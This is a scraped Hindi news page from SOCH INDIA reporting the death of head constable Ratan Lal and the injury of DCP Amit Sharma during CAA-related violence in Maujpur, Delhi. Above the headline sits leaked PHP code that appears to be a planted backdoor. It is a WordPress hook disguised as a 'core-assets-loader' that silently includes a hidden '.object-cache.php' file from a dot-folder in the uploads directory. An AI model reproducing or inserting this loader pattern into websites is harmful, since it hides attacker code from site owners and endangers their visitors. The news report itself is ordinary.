add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मौजपुर में हिंसा-आगजनी के बीच दिल्ली पुलिस के हेड कॉन्स्टेबल की मौत – SOCH INDIA
Menu

देश
मौजपुर में हिंसा-आगजनी के बीच दिल्ली पुलिस के हेड कॉन्स्टेबल की मौत

nobanner

दिल्ली के मौजपुर में हालात तनावपूर्ण हैं. नागरिकता संशोधन कानून (CAA) के खिलाफ प्रदर्शन कर रहे लोग और समर्थक आमने-सामने हैं. हिंसा के दौरान दिल्ली पुलिस के हेड कांस्टेबल रतन लाल की मौत हो गई. वह एसीपी गोकुलपुरी ऑफिस में तैनात थे.

एक पुलिस अधिकारी ने कहा कि सोमवार को नॉर्थ-ईस्ट दिल्ली में नागरिकता कानून को लेकर हुई झड़प के दौरान दिल्ली पुलिस के एक हेड कांस्टेबल की मौत हो गई. कई पुलिसकर्मी घायल भी हुए हैं. उन्होंने कहा कि सोमवार को कई वाहनों, दुकानों और घरों में आग लगा दी गई.

हिंसा में शहादरा के डीसीपी अमित शर्मा भी घायल हो गए. उन्होंने पटपड़गंज के एक अस्पताल में भर्ती कराया गया है, जहां उनका इलाज चल रहा है.